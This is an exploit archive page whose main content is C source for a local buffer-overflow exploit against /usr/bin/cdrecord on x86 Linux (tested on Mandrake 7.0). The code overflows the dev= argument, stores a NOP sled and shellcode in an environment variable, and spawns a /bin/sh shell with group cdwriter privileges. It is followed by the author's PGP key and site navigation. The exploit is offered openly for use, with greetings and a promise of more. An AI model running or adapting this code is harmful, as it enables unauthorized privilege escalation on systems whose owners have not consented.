cdrecord.c

cdrecord.c: Posted Jun 9, 2000; Authored by noir; /usr/bin/cdrecord local exploit for x86 linux - gives gid=80 shell. Tested on Mandrake 7.0.; tags | exploit, shell, x86, local; systems | linux, mandrake; SHA-256 | 8c45b8eeaaa72e51223e3ac9a61b3c58d5f14a3ff1e33a32566ccd253e0be59d; Download | Favorite | View

cdrecord.c

/* U may say gid=80 (cdwriter) is useless but anyways here is the xploit

respect,
noir

PS: wait for strike #3
*/ 
/*  /usr/bin/cdrecord exploit by noir
 *  x86/Linux
 *  noir@gsu.linux.org.tr | noir@olympos.org
 *  dev= param overflow
 *  this script will get you gid = 80 group cdwriter
 *  tested on Mandrake 7.0 (Air)
 *  greetz: dustdevil, Cronos, moog, still, BlaCK #olympos irc.sourtimes.org
 *
 *
 */

#include <stdio.h>
#include <string.h>

#define NOP             0x90
#define RET     0xbffffe66 //play with argv[1] +10, -10 if default is not ok
int
main(int argc, char *argv[])

{
        unsigned char shell[] =
        "\x31\xc0\xb0\x50\x89\xc3\x89\xc1\xb0\x47\xcd\x80"  /*setregid(80, 80) */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

        char egg[400];
    char buf[80];
        int i, a;
        long ret = RET;

     if(argv[1])
        ret = ret - atoi(argv[1]);

        memset(egg, NOP, 400);

        for(i = 0  ; i < 80 ; i+=4)
                *(long *) &buf[i] = ret;

        for( i = 300, a = 0; a < strlen(shell) ; i++, a++ )
    egg[i] = shell[a];

        buf[72] = 0x00;
        egg[399] = 0x00;
        printf("eip: 0x%x\n", ret);

        setenv("EGG", egg, 1);
        execl("/usr/bin/cdrecord", "cdrecord","dev=", buf, "/etc/passwd", 0);

}



-------BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use

mQENAzfpmZ4AAAEIALEp8z+/6SXHZ2IYf0PQnsyCm+9hfHxlQwWQs6BI5rBQdX9J
GuSqJfGX3w+fS9xl6MWRlvno3Nmnk66QhBgs8LnunmyhtFN03TBfq7mGoBYKb79R
4jX/kjGUg9oUCr+6sqwN3bXp812qKpScxKVMvMCtQissVzDLdA01U1wCFhMg7xBQ
N9lP8tJQ1gtKUnzdsnFgsLkgT3uN+Ek7bQdmwz9a1Xqcq2jxVj5j4yEErQoY3J8m
viV+u8mr/Wo0vWEGwIeCWOKNi6SXGz69Pd9a+JRjYIBnuu33o64aEYoMGbFdslNM
KbWxsXJJAwtw4/JqKt/LosYAFreteGhdA56c7JsABRG0IE5vaXIgU2luIDxub2ly
QGdzdS5saW51eC5vcmcudHI+iQEVAwUQN+mZnnhoXQOenOybAQG16Af8Dk4ZRciA
M1Fwq/fJOQJ/kcdszFHAEVHh1nToC99b+ZeoX2I3AIzrpYl0aGZBWQeGbtG4FZuz
ldWQcvT8jsQ1M1FraAZgKIzukxAxiOJL1twlQJyEDYQ3wwyWIXXqS3c1/jl7PgC1
iv7RQXxxLRn9qFPJQcaJavxRAAVytkDQWocTguRaehtdZsjxLmH2eE7cGQe0N9aL
JJfq0XLl1NjeV5pu5oTkc90/aJ/uHxPOStmPULm5WZP6nCTaQ28lPJBaDV8pLdPo
dSg+kvlvhi+k7UgAdvsETA/I6paFyOLq8lFdORA/GHof89NQX3OyJmDGTknfKtAf
9Ky2NbzA12r6zQ==
=o1d1
-----END PGP PUBLIC KEY BLOCK-----

Top Authors In Last 30 Days

Red Hat 267 files
indoushka 178 files
Jay Turla 150 files
Ubuntu 74 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Gentoo 24 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,125)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,591)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,312)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,885)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,861)
UNIX (9,458)
UnixWare (188)
Windows (6,772)
Other

cdrecord.c

cdrecord.c

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

cdrecord.c

Share This

cdrecord.c

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems